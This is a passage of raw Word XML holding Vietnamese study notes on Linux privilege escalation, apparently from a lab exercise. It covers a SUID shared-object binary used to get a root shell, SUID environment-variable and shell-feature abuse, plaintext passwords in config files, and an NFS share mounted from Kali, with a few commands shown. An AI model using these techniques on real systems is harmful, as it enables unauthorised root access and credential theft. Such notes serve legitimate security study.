                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="21"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00052672">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="21"/>
                                </w:rPr>
                                <w:t>/usr/local/bin/suid-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4977" id="Group 128" o:spid="_x0000_s1047" style="position:absolute;margin-left:1in;margin-top:46.45pt;width:123pt;height:33pt;z-index:-251590656;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1440,183" coordsize="15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">
                <v:shape id="Freeform 235" o:spid="_x0000_s1048" style="position:absolute;left:1440;top:183;width:1588;height:165;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="158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" path="m1561,165l27,165r-4,-1l,138,,27,27,,1561,r27,27l1588,138r-23,26l1561,165xe" fillcolor="#868278" stroked="f">
                  <v:fill opacity="9766f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1561,348;27,348;23,347;0,321;0,210;27,183;1561,183;1588,210;1588,321;1565,347" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 236" o:spid="_x0000_s1049" type="#_x0000_t202" style="position:absolute;left:1440;top:183;width:158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83220D9" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00052672" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00052672">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>/usr/local/bin/suid-so</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực thi lại </w:t>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">suid-so </w:t>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>executable và lưu ý rằng lần này, thay vì thanh tiến trình, chúng ta nhận được một root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30460A4E" w14:textId="1A8CF90B" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="6" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0612B4" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="99" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(lam n false ko lay duoc shell root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260837FE"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r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251637760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F78C44E" wp14:editId="0E826177">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1438076</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>181590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4699168" cy="1669351"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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3" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4699168" cy="1669351"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2458D262" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="2" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8BBB89"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SUID / SGID Executables - Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D0560"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65941521"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7CFB8A58"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SUID / SGID Executables - Abusing Shell Features (#2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21572BFF"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283F96AD"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Passwords &amp; Keys - Config Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8437CD" w14:textId="112BDA8E" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="118" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file config thường chứa password ở dạng plaintext hoặc dạng reversible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D7BDB" w14:textId="55533089" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="00052672" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="5" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7379E2FD" wp14:editId="3AE1D5E4">
            <wp:extent cx="3439005" cy="819264"/>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005" cy="819264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251639808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="053DDB42" wp14:editId="04D7667F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2622892</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>181709</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2320003" cy="2063686"/>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5" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2320003" cy="2063686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="429EECFD" w14:textId="75C91910" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F68D29" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E924346"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0C2BA50E" w14:textId="7DC6E476"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NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F7180" w14:textId="3560597C" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="00052672">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="118" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Các file được tạo qua NFD kế thừa ID của </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remote</w:t>
      </w:r>
      <w:r w:rsidR="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user's. Nếu user root enable, ngược lại ID set thành nobody user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C620201" w14:textId="5E6869F6" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="00052672" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="7" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B5FC6C" wp14:editId="5683C15F">
            <wp:extent cx="4305901" cy="10764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901" cy="1076475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F3E924" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="140" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>→ kiểm tra cấu hình nfs share trên máy ảo đang remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6643DF92" w14:textId="15916DC1" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="00052672" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="146" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251746304" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32B00554" wp14:editId="179E2BF0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>738505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1485900" cy="276225"/>
                <wp:effectExtent l="0" t="0" r="0" b="952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76225"/>
                          <a:chOff x="1440" y="368"/>
                          <a:chExt cx="2340" cy="435"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="54" name="Freeform 284"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="368"/>
                            <a:ext cx="1042" cy="165"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2454 1440"/>
                              <a:gd name="T1" fmla="*/ T0 w 1042"/>
                              <a:gd name="T2" fmla="+- 0 534 369"/>
                              <a:gd name="T3" fmla="*/ 534 h 165"/>
                              <a:gd name="T4" fmla="+- 0 1467 1440"/>
                              <a:gd name="T5" fmla="*/ T4 w 1042"/>
                              <a:gd name="T6" fmla="+- 0 534 369"/>
                              <a:gd name="T7" fmla="*/ 534 h 165"/>
                              <a:gd name="T8" fmla="+- 0 1459 1440"/>
                              <a:gd name="T9" fmla="*/ T8 w 1042"/>
                              <a:gd name="T10" fmla="+- 0 532 369"/>
                              <a:gd name="T11" fmla="*/ 532 h 165"/>
                              <a:gd name="T12" fmla="+- 0 1442 1440"/>
                              <a:gd name="T13" fmla="*/ T12 w 1042"/>
                              <a:gd name="T14" fmla="+- 0 514 369"/>
                              <a:gd name="T15" fmla="*/ 514 h 165"/>
                              <a:gd name="T16" fmla="+- 0 1441 1440"/>
                              <a:gd name="T17" fmla="*/ T16 w 1042"/>
                              <a:gd name="T18" fmla="+- 0 511 369"/>
                              <a:gd name="T19" fmla="*/ 511 h 165"/>
                              <a:gd name="T20" fmla="+- 0 1440 1440"/>
                              <a:gd name="T21" fmla="*/ T20 w 1042"/>
                              <a:gd name="T22" fmla="+- 0 507 369"/>
                              <a:gd name="T23" fmla="*/ 507 h 165"/>
                              <a:gd name="T24" fmla="+- 0 1440 1440"/>
                              <a:gd name="T25" fmla="*/ T24 w 1042"/>
                              <a:gd name="T26" fmla="+- 0 396 369"/>
                              <a:gd name="T27" fmla="*/ 396 h 165"/>
                              <a:gd name="T28" fmla="+- 0 1441 1440"/>
                              <a:gd name="T29" fmla="*/ T28 w 1042"/>
                              <a:gd name="T30" fmla="+- 0 391 369"/>
                              <a:gd name="T31" fmla="*/ 391 h 165"/>
                              <a:gd name="T32" fmla="+- 0 1442 1440"/>
                              <a:gd name="T33" fmla="*/ T32 w 1042"/>
                              <a:gd name="T34" fmla="+- 0 388 369"/>
                              <a:gd name="T35" fmla="*/ 388 h 165"/>
                              <a:gd name="T36" fmla="+- 0 1444 1440"/>
                              <a:gd name="T37" fmla="*/ T36 w 1042"/>
                              <a:gd name="T38" fmla="+- 0 384 369"/>
                              <a:gd name="T39" fmla="*/ 384 h 165"/>
                              <a:gd name="T40" fmla="+- 0 1467 1440"/>
                              <a:gd name="T41" fmla="*/ T40 w 1042"/>
                              <a:gd name="T42" fmla="+- 0 369 369"/>
                              <a:gd name="T43" fmla="*/ 369 h 165"/>
                              <a:gd name="T44" fmla="+- 0 2454 1440"/>
                              <a:gd name="T45" fmla="*/ T44 w 1042"/>
                              <a:gd name="T46" fmla="+- 0 369 369"/>
                              <a:gd name="T47" fmla="*/ 369 h 165"/>
                              <a:gd name="T48" fmla="+- 0 2479 1440"/>
                              <a:gd name="T49" fmla="*/ T48 w 1042"/>
                              <a:gd name="T50" fmla="+- 0 388 369"/>
                              <a:gd name="T51" fmla="*/ 388 h 165"/>
                              <a:gd name="T52" fmla="+- 0 2480 1440"/>
                              <a:gd name="T53" fmla="*/ T52 w 1042"/>
                              <a:gd name="T54" fmla="+- 0 391 369"/>
                              <a:gd name="T55" fmla="*/ 391 h 165"/>
                              <a:gd name="T56" fmla="+- 0 2481 1440"/>
                              <a:gd name="T57" fmla="*/ T56 w 1042"/>
                              <a:gd name="T58" fmla="+- 0 396 369"/>
                              <a:gd name="T59" fmla="*/ 396 h 165"/>
                              <a:gd name="T60" fmla="+- 0 2481 1440"/>
                              <a:gd name="T61" fmla="*/ T60 w 1042"/>
                              <a:gd name="T62" fmla="+- 0 507 369"/>
                              <a:gd name="T63" fmla="*/ 507 h 165"/>
                              <a:gd name="T64" fmla="+- 0 2480 1440"/>
                              <a:gd name="T65" fmla="*/ T64 w 1042"/>
                              <a:gd name="T66" fmla="+- 0 511 369"/>
                              <a:gd name="T67" fmla="*/ 511 h 165"/>
                              <a:gd name="T68" fmla="+- 0 2479 1440"/>
                              <a:gd name="T69" fmla="*/ T68 w 1042"/>
                              <a:gd name="T70" fmla="+- 0 514 369"/>
                              <a:gd name="T71" fmla="*/ 514 h 165"/>
                              <a:gd name="T72" fmla="+- 0 2477 1440"/>
                              <a:gd name="T73" fmla="*/ T72 w 1042"/>
                              <a:gd name="T74" fmla="+- 0 518 369"/>
                              <a:gd name="T75" fmla="*/ 518 h 165"/>
                              <a:gd name="T76" fmla="+- 0 2475 1440"/>
                              <a:gd name="T77" fmla="*/ T76 w 1042"/>
                              <a:gd name="T78" fmla="+- 0 521 369"/>
                              <a:gd name="T79" fmla="*/ 521 h 165"/>
                              <a:gd name="T80" fmla="+- 0 2469 1440"/>
                              <a:gd name="T81" fmla="*/ T80 w 1042"/>
                              <a:gd name="T82" fmla="+- 0 527 369"/>
                              <a:gd name="T83" fmla="*/ 527 h 165"/>
                              <a:gd name="T84" fmla="+- 0 2466 1440"/>
                              <a:gd name="T85" fmla="*/ T84 w 1042"/>
                              <a:gd name="T86" fmla="+- 0 530 369"/>
                              <a:gd name="T87" fmla="*/ 530 h 165"/>
                              <a:gd name="T88" fmla="+- 0 2462 1440"/>
                              <a:gd name="T89" fmla="*/ T88 w 1042"/>
                              <a:gd name="T90" fmla="+- 0 532 369"/>
                              <a:gd name="T91"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2" h="165">
                                <a:moveTo>
                                  <a:pt x="1014" y="165"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="27" y="165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2" y="145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4" y="15"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1014" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1039" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1040" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1041" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1041" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1040" y="142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1039" y="145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1037" y="149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1035" y="152"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1029" y="158"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1026" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1022"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85"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="368"/>
                            <a:ext cx="23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C857" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00052672" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00052672">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>mkdir /tmp/n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0554" id="Group 53" o:spid="_x0000_s1050" style="position:absolute;margin-left:1in;margin-top:58.15pt;width:117pt;height:21.75pt;z-index:-251570176;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1440,368" coordsize="23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">
                <v:shape id="Freeform 284" o:spid="_x0000_s1051" style="position:absolute;left:1440;top:368;width:1042;height:165;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="10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" path="m1014,165r-987,l19,163,2,145,1,142,,138,,27,1,22,2,19,4,15,27,r987,l1039,19r1,3l1041,27r,111l1040,142r-1,3l1037,149r-2,3l1029,158r-3,3l1022,163r-8,2xe" fillcolor="#868278" stroked="f">
                  <v:fill opacity="9766f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1014,534;27,534;19,532;2,514;1,511;0,507;0,396;1,391;2,388;4,384;27,369;1014,369;1039,388;1040,391;1041,396;1041,507;1040,511;1039,514;1037,518;1035,521;1029,527;1026,530;1022,532" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 285" o:spid="_x0000_s1052" type="#_x0000_t202" style="position:absolute;left:1440;top:368;width:23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812C857" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00052672" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00052672">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>mkdir /tmp/nfs</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng user root trên máy kali tạo mount point - một điểm gắn kết trên Kali và nối với the </w:t>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E4C78B" w14:textId="4C0276B9" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="64" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C801BA"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7EF71B6D" w14:textId="2CD6A135" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="00BF73E0" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="164" w:lineRule="exact"/>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747328" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32C669C9" wp14:editId="2A08422C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>165100</wp:posOffset>
                </wp:positionV>
